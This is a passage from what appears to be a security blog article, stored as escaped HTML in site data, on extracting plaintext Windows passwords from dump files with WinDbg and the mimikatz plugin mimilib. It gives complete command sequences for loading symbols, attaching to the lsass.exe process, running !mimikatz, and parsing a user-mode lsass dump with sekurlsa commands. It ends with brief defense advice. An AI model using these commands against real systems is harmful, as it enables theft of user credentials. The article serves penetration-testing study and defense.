server\u003C\u002Fp>\u003Cp>Reload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.Reload\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>!process 0 0 lsass.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Loaded normally, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017362654_2_3101ff7258-1.jpeg\">\u003C\u002Fp>\u003Cp>If this part still fails, try using a VPN to connect to the internet\u003C\u002Fp>\u003Cp>If the test environment cannot connect to the internet, symbol files can be downloaded by obtaining manifest files via SymChk\u003C\u002Fp>\u003Cp>Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-hardware\u002Fdrivers\u002Fdebugger\u002Fusing-a-manifest-file-with-symchk\u003C\u002Fp>\u003Cp>Execute on computer A (without internet connection):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SymChk \u002Fom c:\\Manifest\\man.txt \u002Fid c:\\test\\MEMORY.DMP\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Obtain the file c:\\Manifest\\man.txt, copy it to computer B (with internet connection), and execute the following command on computer B:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SymChk \u002Fim c:\\test\\man.txt \u002Fs srv*c:\\mysymbolNew*https:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>A new folder c:\\mysymbolNew will be generated. Copy it to computer A, start WinDbg on computer A, and specify the new symbol file location as c:\\mysymbolNew with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.symfix c:\\mysymbolNew\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.Reload\u003Cbr>!process 0 0 lsass.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Loaded normally, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017391534_3_aaf1f568cc-1.jpeg\">\u003C\u002Fp>\u003Ch3>4. Load mimilib plugin\u003C\u002Fh3>\u003Cp>Refer to the previous article 'Mimilib Utilization Analysis'\u003C\u002Fp>\u003Ch3>(1) Method 1\u003C\u002Fh3>\u003Cp>Save mimilib.dll to the winext directory of WinDbg\u003C\u002Fp>\u003Cp>The saved path in my test environment (Server2012R2x64) is: C:\\Program Files\\Debugging Tools for Windows (x64)\\winext\u003C\u002Fp>\u003Cp>Start WinDbg\u003C\u002Fp>\u003Cp>The command to load the plugin is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.load mimilib\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>(2) Method 2\u003C\u002Fh3>\u003Cp>Directly load the absolute path of mimilib, example as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.load c:\\test\\mimilib\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>In summary, the complete command to set up the configuration environment and export passwords is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.sympath SRV*c:\\mysymbol*http:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003Cbr>.reload\u003Cbr>!process 0 0 lsass.exe\u003Cbr>.process 890f4530\u003Cbr>.load c:\\test\\mimilib\u003Cbr>.reload\u003Cbr>!mimikatz\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The complete process is shown in the following figure:\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017417953_4_294dd38340-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017462794_5_b1efcc088e-1.jpeg\">\u003C\u002Fp>\u003Cp>To save the output results to a file, you can use the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.logopen c:\\test\\log.txt\u003Cbr>!mimikatz\u003Cbr>.logclose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Exploitation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Extracting passwords from user-mode dump files\u003C\u002Fh3>\u003Cp>Obtain a dump file of the lsass.exe process via the API MiniDumpWriteDump()\u003C\u002Fp>\u003Cp>Use mimikatz to extract passwords from the dump file with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe log \"sekurlsa::minidump lsass.dmp\" \"sekurlsa::logonPasswords full\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Extracting passwords from kernel-mode dump files\u003C\u002Fh3>\u003Cp>Enable the dump file functionality\u003C\u002Fp>\u003Cp>Force a system Blue Screen of Death (BSOD)\u003C\u002Fp>\u003Cp>Load the dump file using WinDbg and invoke mimilib to export plaintext passwords\u003C\u002Fp>\u003Ch2>0x05 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Extracting passwords from user-mode dump files\u003C\u002Fh3>\u003Cp>Intercept the behavior of the API MiniDumpWriteDump(); some security products already support this feature\u003C\u002Fp>\u003Ch3>2. Extracting passwords from kernel-mode dump files\u003C\u002Fh3>\u003Cp>Enable dump encryption\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-server\u002Fvirtualization\u002Fhyper-v\u002Fmanage\u002Fabout-dump-encryption\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If an attacker gains administrator privileges on the system, they can disable dump encryption\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduced methods for extracting passwords from user-mode dump files and kernel-mode dump files, and provided defense recommendations based on exploitation techniques\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",906,"Onedaysec",5,"published","2026-02-02T07:38:21.454Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Extract Passwords from Kernel Dump Files Using Mimilib & WinDbg","mimilib, WinDbg, dump files, password extraction, kernel-mode, BSOD, penetration testing, security",null,false,[],{"docs":43,"hasNextPage":40},[4,44,45,46,47],617,616,615,614,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.347Z","2026-07-23T16:01:50.653Z","draft","2026-07-23T16:13:48.274Z"]